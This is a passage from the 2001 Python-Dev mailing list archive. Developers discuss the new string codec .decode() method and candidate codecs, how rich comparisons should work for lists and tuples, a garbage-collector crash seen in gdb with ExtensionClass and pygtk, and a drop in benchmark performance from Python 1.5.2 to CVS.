print "<p>%s</p>"%text.encode("html")

seems delightfully simpleminded.

Cheers,
M.

-- 
  GAG: I think this is perfectly normal behaviour for a Vogon. ...
VOGON: That is exactly what you always say.
  GAG: Well, I think that is probably perfectly normal behaviour for a
      psychiatrist. -- The Hitch-Hikers Guide to the Galaxy, Episode 9


From mal at lemburg.com  Wed May 16 13:06:14 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 13:06:14 +0200
Subject: [Python-Dev] Easy codec access
References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <m31yppo99f.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3B025F26.A625DE02@lemburg.com>

Michael Hudson wrote:
> 
> Guido van Rossum <guido at digicool.com> writes:
> 
> > > I've just checked in a set of patches which implement the new
> > > .decode() method along with a couple of useful codecs.
> >
> > Cool!
> 
> Indeed.  Good idea, Marc!

Thanks :-)
 
> This is a bit unfriendly though:
> 
> >>> "bobbins".encode("gzip")
> Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
>   File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
>     raise SystemError,\
> SystemError: module "encodings.gzip" failed to register
> 
> I thought SystemErrors shouldn't ever happen (isn't it what gets
> raised for an illegal opcode, for example?).

This is due to the zlib module not being installed. The reason
for the search function in encodings/__init__.py raising a
SystemError is that it did find a module named gzip, but this
module does not export the needed registration API getregentry().

Perhaps it should just raise a LookupError instead, though...
 
> > > To see just how easy it is to write codecs, please have
> > > a look at the string codecs I added in this patch (e.g.
> > > zlib_codec.py or hex_codec.py). I am pretty sure that there
> > > are a lot more useful things in the standard lib which could
> > > benefit from these easy-to-use interfaces.
> >
> > As an excercise, I added a quoted-printable codec.  It was easy
> > indeed!
> 
> urlencode would be nice.  Maybe re.escape, too.  html entities?
> That's probably a bigger can of worms, but
> 
> print "<p>%s</p>"%text.encode("html")
> 
> seems delightfully simpleminded.

Right. That's the idea... volunteers are welcome :-) 

There are lots of those little "escape this, encode that" tasks 
which could benefit from the codec machinery. The ones you
mention would certainly be good candidates. pickle and marshal
would also be a good to have wrapped as codecs.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mwh at python.net  Wed May 16 13:19:15 2001
From: mwh at python.net (Michael Hudson)
Date: 16 May 2001 12:19:15 +0100
Subject: [Python-Dev] Easy codec access
In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 16 May 2001 13:06:14 +0200"
References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <m31yppo99f.fsf@atrus.jesus.cam.ac.uk> <3B025F26.A625DE02@lemburg.com>
Message-ID: <m3y9rxmtho.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal at lemburg.com> writes:

> > This is a bit unfriendly though:
> > 
> > >>> "bobbins".encode("gzip")
> > Traceback (most recent call last):
> >   File "<stdin>", line 1, in ?
> >   File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
> >     raise SystemError,\
> > SystemError: module "encodings.gzip" failed to register
> > 
> > I thought SystemErrors shouldn't ever happen (isn't it what gets
> > raised for an illegal opcode, for example?).
> 
> This is due to the zlib module not being installed. 

No it's not, actually.  I *thought* I was getting the error message
because the zlib encoding doesn't alias itself to gzip (whether it
should or not is another question).  But in fact if you specify a
bogus encoding you get a nice error message:

>>> "bobbins".encode("nonesuch")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
LookupError: unknown encoding

but:

>>> "bobbins".encode("sys")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function
    raise SystemError,\
SystemError: module "encodings.sys" failed to register

I have to admit I don't really know what's going on here, but the
error is just confusing.

> The reason for the search function in encodings/__init__.py raising
> a SystemError is that it did find a module named gzip, but this
> module does not export the needed registration API getregentry().

Yep.  

> Perhaps it should just raise a LookupError instead, though...

Might be easiest.

> > urlencode would be nice.  Maybe re.escape, too.  html entities?
> > That's probably a bigger can of worms, but
> > 
> > print "<p>%s</p>"%text.encode("html")
> > 
> > seems delightfully simpleminded.
> 
> Right. That's the idea... volunteers are welcome :-) 

Maybe this evening.

> There are lots of those little "escape this, encode that" tasks 
> which could benefit from the codec machinery. The ones you
> mention would certainly be good candidates. pickle and marshal
> would also be a good to have wrapped as codecs.

Ooh yes, hadn't thought of them.

'YW5vdGhlci1mdW4tdG95\n'.decode("base64")-ly y'rs
M.

-- 
  There's an aura of unholy black magic about CLISP.  It works, but
  I have no idea how it does it.  I suspect there's a goat involved
  somewhere.                     -- Johann Hibschman, comp.lang.scheme


From aahz at rahul.net  Wed May 16 15:16:18 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Wed, 16 May 2001 06:16:18 -0700 (PDT)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <20010515222738.A9996@thyrsus.com> from "Eric S. Raymond" at May 15, 2001 10:27:38 PM
Message-ID: <20010516131618.C40CC99C91@waltz.rahul.net>

Eric S. Raymond wrote:
> 
> (Yes, I know some sexy lady Pythonistas.  No, you can't have their
> phone numbers.  Pthfthfthpht...)

That's okay, I have their e-mail addresses.  Wanna bet on which of us
gets a response first?
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From barry at digicool.com  Wed May 16 15:42:15 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 16 May 2001 09:42:15 -0400
Subject: [Python-Dev] Comparison speed
References: <15105.46090.203278.397835@anthem.wooz.org>
	<LNBBLJKPBEHFEDALKOLCAEHPKCAA.tim.one@home.com>
Message-ID: <15106.33719.14403.13051@anthem.wooz.org>

>>>>> "TP" == Tim Peters <tim.one at home.com> writes:

    TP> Random clue: when you're too lazy to try to subtact out loop
    TP> overhead (not a knock, I am too), you may have better luck
    TP> with

    TP>     r = [1] * 1000000

    TP> than

    TP>     r = range(1000000)

Ah, good point!


From guido at digicool.com  Wed May 16 17:01:40 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 10:01:40 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Wed, 16 May 2001 09:28:45 +0200."
             <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> 
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com> <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com>  
            <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de> 
Message-ID: <200105161501.KAA02226@cj20424-a.reston1.va.home.com>

> Marc-Andre once proposed a type representing the immediate supertype
> of both byte strings and unicode strings; let's call it abstract string.
> Then I could write isinstance(e, types.AbstractString).

This will probably be doable in 2.2.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May 16 17:24:55 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 10:24:55 -0500
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: Your message of "Tue, 15 May 2001 20:01:05 -0400."
             <LNBBLJKPBEHFEDALKOLCGEGMKCAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEGMKCAA.tim.one@home.com> 
Message-ID: <200105161524.KAA02518@cj20424-a.reston1.va.home.com>

> The question remaining is how much of this list/tuple richcmp behavior is
> guaranteed by the language and how much is just implementation-dependent
> fuzz.

Unclear what you're asking.  The language doesn't require any
particular semantics for sequence comparisons, but the language of
course includes the tuple and list squence types, and it describes
(albeing lacking some rigorous detail) what comparisons for those do.
If there are specific lacks of detail, it probably helps to think
about filling those in.

> For a more vanilla example, I removed the EQ/NE "lengths differ?"
> tuple richcmp early-exit test because I never found code that made
> it trigger. (but tons of code that gets there without triggering).
> But this has semantic implications too: an implementation without
> the early exit may call user-defined comparison routines that raise
> exceptions when comparing tuples of different lengths now.  Do you
> care?  (I don't.)

I don't care about exceptions either in this case; the shortcut seems
fair game.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip at pobox.com  Wed May 16 16:28:04 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 16 May 2001 09:28:04 -0500
Subject: [Python-Dev] Easy codec access
In-Reply-To: <3B025F26.A625DE02@lemburg.com>
References: <3B011CA8.9DDB4FC7@lemburg.com>
	<200105151635.LAA29530@cj20424-a.reston1.va.home.com>
	<m31yppo99f.fsf@atrus.jesus.cam.ac.uk>
	<3B025F26.A625DE02@lemburg.com>
Message-ID: <15106.36468.62292.611515@beluga.mojam.com>

    mal> pickle and marshal would also be a good to have wrapped as codecs.

Why?  They operate on much more than strings.

-- 
Skip Montanaro (skip at pobox.com)
(847)971-7098


From fredrik at effbot.org  Wed May 16 17:07:18 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Wed, 16 May 2001 17:07:18 +0200
Subject: [Python-Dev] Easy codec access
References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><m31yppo99f.fsf@atrus.jesus.cam.ac.uk><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com>
Message-ID: <002101c0de19$e7875a90$e46940d5@hagrid>

skip wrote:

>     mal> pickle and marshal would also be a good to have wrapped as codecs.
> 
> Why?  They operate on much more than strings.

hypergeneralization, of course.

more candidates:

    "10".decode("int")
    "10.0".decode("float")
    "[1, 2, 3]".decode("list")
    "readme.txt".decode("file")
    "SyntaxError".decode("raise")
    (etc)

Cheers /F


From nas at python.ca  Wed May 16 18:19:42 2001
From: nas at python.ca (Neil Schemenauer)
Date: Wed, 16 May 2001 09:19:42 -0700
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 14, 2001 at 09:40:21PM +0200
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>
Message-ID: <20010516091942.A16455@glacier.fnational.com>

Martin v. Loewis wrote:
> In any case, I think you need to analyse this in a debugger.

#7  0x080bc17e in tupletraverse (o=0x8154914, visit=0x807d640 <visit_decref>, 
    arg=0x0) at ../Objects/tupleobject.c:366
366                             err = visit(x, arg);
(gdb) p *o
$11 = {ob_refcnt = 1, ob_type = 0x80eb5a0, ob_size = 1, ob_item = {0x402c5180}}
(gdb) p *o->ob_item[0]
$12 = {ob_refcnt = 2, ob_type = 0x0}

In other words the GC is finding a tuple object that contains an
element with a funny looking address (data segment?) and an
op_type of NULL.  The collector has started running from here:

#10 0x0807debc in collect_generations () at ../Modules/gcmodule.c:467
#11 0x0807dfc4 in _PyGC_Insert (op=0x819f57c) at ../Modules/gcmodule.c:507
#12 0x080af56a in PyDict_New () at ../Objects/dictobject.c:149
#13 0x0808d8b8 in getBaseDictionary (type=0x402bcc40)
    at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1249
#14 0x0808eb45 in initializeBaseExtensionClass (self=0x402bcc40)
    at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1495
#15 0x08095fb1 in export_subclassed_type (dict=0x81851fc, 
    name=0x402a9388 "GdkDragContext", typ=0x402bcc40, bases=0x816fc34)
    at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:3451
#16 0x400194ac in pygobject_register_class (dict=0x81851fc, 
    class_name=0x402a9388 "GdkDragContext", 
    get_type=0x404d5c50 <gdk_drag_context_get_type>, ec=0x402bcc40, 
    bases=0x816fc34) at gobjectmodule.c:202
#17 0x402a55fd in pygtk_register_classes (d=0x81851fc) at gtk.c:31844
#18 0x40257004 in init_gtk () at gtkmodule.c:98

I don't have time to dig deeper into this right now but perhaps
this will help someone.

  Neil


From mal at lemburg.com  Wed May 16 18:24:57 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 18:24:57 +0200
Subject: [Python-Dev] Easy codec access
References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><m31yppo99f.fsf@atrus.jesus.cam.ac.uk><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> <002101c0de19$e7875a90$e46940d5@hagrid>
Message-ID: <3B02A9D9.113836D6@lemburg.com>

Fredrik Lundh wrote:
> 
> skip wrote:
> 
> >     mal> pickle and marshal would also be a good to have wrapped as codecs.
> >
> > Why?  They operate on much more than strings.

Of course. 

Still their basic task is to take an object and
encode in some way for dumps() and do the reverse for loads().
That's pretty much what codecs normally do ;-)

I wasn't referring to the use of pickle and marshal with string.encode()
and .decode(); even though you could then decode a pickle using
"pickledata".decode("pickle") and get back the object.

These two are very useful though when it comes to using codecs
for file wrappers:

f = codecs.open('mypicklfile', mode='wb', encoding='pickle')
f.write((123, 'abc', 456.789))
f.close()

f = codecs.open('mypicklfile', mode='rb', encoding='pickle')
t = f.read()
f.close()

> hypergeneralization, of course.
> 
> more candidates:
> 
>     "10".decode("int")
>     "10.0".decode("float")
>     "[1, 2, 3]".decode("list")
>     "readme.txt".decode("file")
>     "SyntaxError".decode("raise")
>     (etc)

You forgot the most important one ;-) ...

	"print 'My first Python program'".decode("python").run()

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From skip at pobox.com  Wed May 16 19:44:15 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 16 May 2001 12:44:15 -0500
Subject: [Python-Dev] Easy codec access
In-Reply-To: <3B02A9D9.113836D6@lemburg.com>
References: <3B011CA8.9DDB4FC7@lemburg.com>
	<200105151635.LAA29530@cj20424-a.reston1.va.home.com>
	<m31yppo99f.fsf@atrus.jesus.cam.ac.uk>
	<3B025F26.A625DE02@lemburg.com>
	<15106.36468.62292.611515@beluga.mojam.com>
	<002101c0de19$e7875a90$e46940d5@hagrid>
	<3B02A9D9.113836D6@lemburg.com>
Message-ID: <15106.48239.813965.579600@beluga.mojam.com>

    mal> Still their basic task is to take an object and encode in some way
    mal> for dumps() and do the reverse for loads().  That's pretty much
    mal> what codecs normally do ;-)

Yes, I see that.  The conceptual problem I have is that in all previous
examples I've seen here they have taken as input and returned as outputs
only strings or unicode objects.

    mal> These two are very useful though when it comes to using codecs
    mal> for file wrappers:

This use I missed.  Thanks for the explanation.

Skip


From mal at lemburg.com  Wed May 16 20:33:44 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 20:33:44 +0200
Subject: [Python-Dev] Performance compares
Message-ID: <3B02C808.E3354D3F@lemburg.com>

After having read a little into the comparison thread, I tried
some performance compares on my own: the one between
the current CVS version and Python 1.5.2.

Both versions were compiled on the same Linux machine, using the
same GCC compiler and optimization settings.

Here are the results from pybench 0.9 and pystone; some of the
figures show quite dramatic slow-downs. I'm not sure where they
result from, but they do concern me a bit, since the upgrade
path from 1.5.2 is probably the most common one to be expected
in user-land.

Since it is possible that these figures result from my specific 
machine setup, I'd like to know what other people see on their
machines.

Thanks.
--

Python 1.5.2:
Pystone(1.1) time for 10000 passes = 3.26
This machine benchmarks at 3067.48 pystones/second

Python CVS:
Pystone(1.1) time for 10000 passes = 4.43
This machine benchmarks at 2257.34 pystones/second

--

PYBENCH 0.9

Benchmark: /home/lemburg/tmp/pybench-cvs-O.pyb (rounds=10, warp=20)

Tests:                              per run    per oper.    diff *)
------------------------------------------------------------------------
          BuiltinFunctionCalls:    1152.60 ms    9.04 us   +64.70%
           BuiltinMethodLookup:     903.90 ms    1.72 us          
                 CompareFloats:     908.30 ms    2.02 us   +40.94%
         CompareFloatsIntegers:    1276.25 ms    2.84 us   +37.15%
               CompareIntegers:    1075.50 ms    1.19 us   +21.09%
                  CompareLongs:     989.40 ms    2.20 us   +47.12%
                CompareStrings:     844.80 ms    2.25 us   +33.99%
                CompareUnicode:    1018.65 ms    2.72 us       n/a
                 ConcatStrings:    1226.30 ms    8.18 us   +92.56%
                 ConcatUnicode:    1575.40 ms   10.50 us       n/a
               CreateInstances:    2094.05 ms   49.86 us  +101.86%
       CreateStringsWithConcat:    1515.75 ms    7.58 us  +111.67%
       CreateUnicodeWithConcat:    1833.85 ms    9.17 us       n/a
                  DictCreation:    2795.30 ms   18.64 us  +203.34%
             DictWithFloatKeys:    2285.70 ms    3.81 us   +18.73%
           DictWithIntegerKeys:    1444.65 ms    2.41 us   +58.53%
            DictWithStringKeys:    1262.60 ms    2.10 us   +52.83%
                      ForLoops:     989.95 ms   99.00 us   -10.01%
                    IfThenElse:    1232.45 ms    1.83 us   +23.25%
                   ListSlicing:     621.40 ms  177.54 us          
                NestedForLoops:     986.60 ms    2.82 us   +52.09%
          NormalClassAttribute:    1231.15 ms    2.05 us   +36.70%
       NormalInstanceAttribute:    1114.15 ms    1.86 us   +27.11%
           PythonFunctionCalls:    1251.25 ms    7.58 us   +46.09%
             PythonMethodCalls:    1034.35 ms   13.79 us   +42.19%
                     Recursion:     922.15 ms   73.77 us   +36.76%
                  SecondImport:    1055.45 ms   42.22 us  +100.47%
           SecondPackageImport:    1061.35 ms   42.45 us   +96.31%
         SecondSubmoduleImport:    1292.35 ms   51.69 us   +77.89%
       SimpleComplexArithmetic:    1748.00 ms    7.95 us  +120.97%
        SimpleDictManipulation:    1172.85 ms    3.91 us   +47.85%
         SimpleFloatArithmetic:     881.25 ms    1.60 us   +12.30%
      SimpleIntFloatArithmetic:     833.80 ms    1.26 us          
       SimpleIntegerArithmetic:     839.00 ms    1.27 us          
        SimpleListManipulation:    1252.60 ms    4.64 us   +69.37%
          SimpleLongArithmetic:    1360.65 ms    8.25 us  +100.43%
                    SmallLists:    2380.05 ms    9.33 us  +116.72%
                   SmallTuples:    1793.80 ms    7.47 us  +101.52%
         SpecialClassAttribute:    1257.35 ms    2.10 us   +37.91%
      SpecialInstanceAttribute:    1340.25 ms    2.23 us   +21.13%
                StringMappings:    1601.50 ms   12.71 us       n/a
              StringPredicates:    1059.70 ms    3.78 us       n/a
                 StringSlicing:    1235.90 ms    7.06 us   +98.32%
                     TryExcept:    1272.55 ms    0.85 us   +28.39%
                TryRaiseExcept:    1383.45 ms   92.23 us   +77.48%
                  TupleSlicing:    1163.05 ms   11.08 us   +75.29%
               UnicodeMappings:    1232.80 ms   68.49 us       n/a
             UnicodePredicates:    1294.95 ms    5.76 us       n/a
             UnicodeProperties:    1410.45 ms    7.05 us       n/a
                UnicodeSlicing:    1296.80 ms    7.41 us       n/a
------------------------------------------------------------------------
            Average round time:   73388.00 ms                  n/a

*) measured against: /home/lemburg/tmp/pybench-1.5.2-O.pyb (rounds=10, warp=20)

(The compares not shown are below noise level (+-10%))

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one at home.com  Wed May 16 21:07:49 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 15:07:49 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: <200105161524.KAA02518@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEJIKCAA.tim.one@home.com>

[Tim]
> The question remaining is how much of this list/tuple richcmp behavior is
> guaranteed by the language and how much is just implementation-dependent
> fuzz.

[Guido]
> Unclear what you're asking.  The language doesn't require any
> particular semantics for sequence comparisons, but the language of
> course includes the tuple and list squence types, and it describes
> (albeing lacking some rigorous detail) what comparisons for those do.

The current

    Tuples and lists are compared lexicographically using comparison
    of corresponding items.

was quite clear in a cmp-only world.  In a richcmp world, "compared
lexicographically" is fuzzy enough that different implementations may do
different things in good faith, competent users may disagree about what it
means in specific cases, and programs may yield different results across
implementations (or random CVS patches <wink>).

> If there are specific lacks of detail, it probably helps to think
> about filling those in.

The *level* of additional detail intended is the cutoff between what's
guaranteed by the language and what's left up to the implementation.

The full truth before was relatively simple.  For a pair x, y of lists or
tuples,

def __cmp__(x, y):  # pretending this is a method on lists and tuples
    i = 0
    while i < len(x) and i < len(y):
        c = cmp(x[i], y[i])
        if c:
            return c
        i += 1
    return cmp(len(x), len(y))

was *almost* the entire tale, incl. that lengths were re-fetched on each
iteration.  What's left unexplained is the treatment of recursive lists, and
so the result of comparing them is a prime suspect for different behavior
across implementations and releases.

In a richcmp world, there are several additional ways in which the above
fails to capture the full truth, and each of those ways is another prime
suspect for surprises.

For example, I believe it's *intended* that:

1. Element comparisons continue to be strictly left-to-right, and
   that no element comparisons are to be performed after the leftmost
   element comparison that settles the issue (if any).

2. tuple/list comparison via == or != must use only == comparison on
   elements, and that implementations are allowed (but not required)
   to skip all element comparisons when == or != comparison is given
   lists/tuples of different sizes.

OTOH, I doubt (but don't know) it's intended that all implementations must
emulate other semantically significant details of the current implementation,
like:

1. <=, <, > and >= comparisons will do at most one element comparison
   that is not an == comparison.

2. Whenever a <, <=, > or >= element comparison is needed, the long-
   winded details of how that works, incl. but not limited to the
   specific "first try ==, then try <, then try >" strategy used to
   simulate a pre-richcmp cmp() when all else fails.

Going back to the original example:

>>> class C:
...     def __lt__(x, y): return 1
...     __eq__ = __lt__
...
>>> a, b = C(), C()
>>> a < b       #1
1
>>> [a] < [b]   #2
0
>>> cmp(a, b)   #3
0
>>> a > b       #4
1
>>> a == b      #5
1
>>> a != b      #6
1
>>>

Which of those results are *required* by the language, and which merely
*allowed*?

+ I believe #1, #4 and #5 are required.

+ I have no idea whether to call it "a bug" if the #2 and/or #3
  and/or #6 results differed, e.g., under Jython, or under
  CPython 2.3.  Indeed, I'm not even sure why #6 returns 1 under
  CPython today, and I've been staring at this a lot lately <wink>
  ... OK, #6 ends up getting resolved by comparing object
  addresses, which leaves "required or not?" fuzzy (i.e., *must*
  it be resolved that way?  or is it implementation-defined?).


From guido at digicool.com  Wed May 16 22:35:46 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 15:35:46 -0500
Subject: [Python-Dev] Rich comparison of lists and tuples
In-Reply-To: Your message of "Wed, 16 May 2001 15:07:49 -0400."
             <LNBBLJKPBEHFEDALKOLCOEJIKCAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCOEJIKCAA.tim.one@home.com> 
Message-ID: <200105162035.PAA04299@cj20424-a.reston1.va.home.com>

[Subject fixed]

[Tim shows there's a lot left to the imagination when trying to glean
the meaning of list1==list2 using rich comparisons.]

I would like to break this down by defining the mapping between cmp()
and rich comparisons.

I propose:

- If cmp() is requested but not defined, and rich comparisons are
  defined, try ==, <, > in order; if all three yield false, act as if
  rich comparisons were not defined, and use the fallback comparison
  (i.e. by address).

- If a rich comparison is requested but not defined, use cmp() and use
  the obvious mapping.

- Continue to define the comparison of unequal sequences in terms of
  cmp().

- Testing == or != for sequences takes these shortcuts:

  1. if the lengths differ, the sequences differ

  2. compare the elements using == until a false return is found

Note that this defines 'x!=y' as 'not x==y' for sequences.  We could
easily go the extra mile and define != to use only != on the items;
but is this worth the extra complexity?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip at pobox.com  Wed May 16 22:37:43 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 16 May 2001 15:37:43 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <20010516091942.A16455@glacier.fnational.com>
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>
	<200105122108.QAA09951@cj20424-a.reston1.va.home.com>
	<200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>
	<15103.65486.61021.328424@beluga.mojam.com>
	<200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>
	<20010516091942.A16455@glacier.fnational.com>
Message-ID: <15106.58647.495143.164636@beluga.mojam.com>

    Neil> In other words the GC is finding a tuple object that contains an
    Neil> element with a funny looking address (data segment?) and an
    Neil> op_type of NULL. 

Neil,

I'm not sure if the funny looking address is a red herring or the key to the
crime.  I tried running with a breakpoint set in getBaseDictionary.  The
first couple times, the type parameter looked like

    $26 = (PyExtensionClass *) 0x80e7f60
    $27 = {ob_refcnt = 2, ob_type = 0x80e7f60, ob_size = 0, 
      tp_name = 0x80d7138 "ExtensionClass", ...}

    $28 = (PyExtensionClass *) 0x80e8060
    $29 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, 
      tp_name = 0x80d7209 "Base", ...}

The third time it looked like

    $30 = (PyExtensionClass *) 0x4019f120
    $31 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, 
      tp_name = 0x4019dab2 "GObject", ...}

The difference between the first two calls and the third one is that the
first two objects are defined in ExtensionClass.o, which I currently
statically link into the interpreter.  The Gtk/GObject stuff is dynamically
loaded into the running executable, so it's not surprising that it winds up
at a wildly different address than the ExtensionClass stuff.  My current
best guess is that whatever object the tuple is referring to is declared
static in the dynamically loaded Gtk stuff and has no business getting
reclaimed by the collector.  Sounds like a missing Py_INCREF somewhere.

At the earliest point I've been able to check that object so far, its
ob_type field is NULL.

Skip


From cpr at emsoftware.com  Thu May 17 00:24:15 2001
From: cpr at emsoftware.com (Chris Ryland)
Date: Wed, 16 May 2001 18:24:15 -0400
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
Message-ID: <00f201c0de57$03042c20$6901a8c0@EM2>

This talk is most entertaining! Highly recommended to you good folk, if only
as a reinforcement of the good design principles embodied in Python (with
the exception of print >> ;-).

Jonathan Rees (an old Scheme/T hand) kept referring to Python whenever he
wanted to give an example of a modern dynamic language (disclaiming a lot of
knowledge about it). He mentioned it three or four times (usually
positively), so it must be on the tip of his mind.
--
Cheers!
Chris Ryland
Em Software, Inc.
www.emsoftware.com


From greg at cosc.canterbury.ac.nz  Thu May 17 03:49:31 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 17 May 2001 13:49:31 +1200 (NZST)
Subject: [Python-Dev] Easy codec access
In-Reply-To: <3B02A9D9.113836D6@lemburg.com>
Message-ID: <200105170149.NAA18480@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal at lemburg.com>:

> You forgot the most important one ;-) ...
>
>	"print 'My first Python program'".decode("python").run()

Surely that should be:

   "'My first Python program'.encode('stdout')".decode("python").decode("run")

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From tim.one at home.com  Thu May 17 03:56:56 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 21:56:56 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>

[Martin v. Loewis]
> I'll put a patch on SF soon which does what you want to do, i.e. tries
> tp_compare as the first thing if tp_richcompare is not there.

Thanks!  I'll check it out.

> Even with this patch, your code is faster if strings have a
> richcompare.

OK, from what I understand, that makes no sense.  Does it to you?  Assuming
you're still talking about my silly little

     "ab" < "cd"

test, then all the new code you put into your richcompare slot was a waste of
cycles for that specific case:  the new richcmp "objects the same type?" test
would fail, then the new "pointers equal?" test would fail, then the new "op
== Py_EQ?" test would fail, and then richcompare would give up and call
string_compare() anyway.  So I'm either missing something fundamental about
what you did, or it's a timing anomaly on your box that defies obvious
explanation ("but if I add three new tests that don't pay off, and make an
extra call, then it's faster!").

> Without richcompare, I get
>
> 0.720
> 0.720
> 0.720
> 0.730
> 0.720
> 0.720
> 0.730
> 0.720
> 0.720
> 0.730
>
> With it, I get
>
> 0.710
> 0.720
> 0.720
> 0.710
> 0.710
> 0.720
> 0.710
> 0.710
> 0.710
> 0.720

See above.

> Given that stock CVS python is in the 0.78 range, the different is
> neglectable, though.

Oh, I don't like giving up that easy on things that make no sense --
something else is happening here, although I've no idea what.


From tim.one at home.com  Thu May 17 04:17:37 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 22:17:37 -0400
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B02C808.E3354D3F@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com>

[MAL]
> Since it is possible that these figures result from my specific
> machine setup, I'd like to know what other people see on their
> machines.

Is this the same machine where you were able to get 15% difference a few
years ago by adding or removing an unreachable printf in ceval.c (or was that
Vladimir)?  If so, I bet it's degenerated to random 50% difference since then
<wink>.

My Win98SE box is *astonishingly* useless for timings.  Without fail, the
first time I run pystone after a reboot yields a result a solid 50% higher
than the second or subsequent times I run it (yes, it's major-league *slower*
the second time).  This is true across dozens of trials over several months,
and across all versions of Python.

And simple little loops routinely vary in reported runtime by a factor of 3.
I may have to dig my old Win95 box out of the packing crate <0.6 wink>.

None of that changes, of course, that the numbers you got are scary.


From jeremy at digicool.com  Thu May 17 00:37:47 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Wed, 16 May 2001 18:37:47 -0400 (EDT)
Subject: [Python-Dev] Performance compares
